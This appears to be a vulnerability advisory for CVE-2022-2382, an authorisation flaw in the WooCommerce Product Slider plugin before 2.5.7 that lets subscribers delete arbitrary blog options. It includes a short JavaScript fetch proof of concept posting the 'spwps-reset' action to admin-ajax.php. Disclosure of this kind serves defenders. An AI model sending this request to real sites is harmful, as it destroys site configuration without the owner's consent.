Product Slider for WooCommerce < 2.5.7 – Subscriber+ Arbitrary Options Deletion | CVE 2022-2382 | Plugin Vulnerabilities

Description

The plugin has flawed CSRF checks and lack authorisation in some of its AJAX actions, allowing any authenticated users, such as subscriber to call them. One in particular could allow them to delete arbitrary blog options.

Proof of Concept

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },

  "method": "POST",
  "body": "action=spwps-reset&unique=template",
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

Affects Plugins

woo-product-slider

Fixed in 2.5.7

References

CVE

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website

https://kazet.cc/

Submitter twitter

Verified

Yes

WPVDB ID

777d4637-444b-4eda-bc21-95d3a3bf6cd3

Timeline

Publicly Published

2022-07-26 (about 1 years ago)

Added

2022-07-26 (about 1 years ago)

Last Updated

2023-04-22 (about 1 years ago)

Other

Published

Title

Published

2023-11-27

Title

Participants Database < 2.5.6 - Missing Authorization

Published

2024-03-28

Title

Church Admin < 4.1.19 - Missing Authorization

Published

2024-04-25

Title

Smart Forms < 2.6.92 - Missing Authorization to Notice Dismissal

Published

2024-02-20

Title

Enjoy Social Feed <= 6.2.2 - Subscriber+ Plugin Database Reset

Published

2024-04-12

Title

Ovic Addon Toolkit <= 2.6.1 - Missing Authorization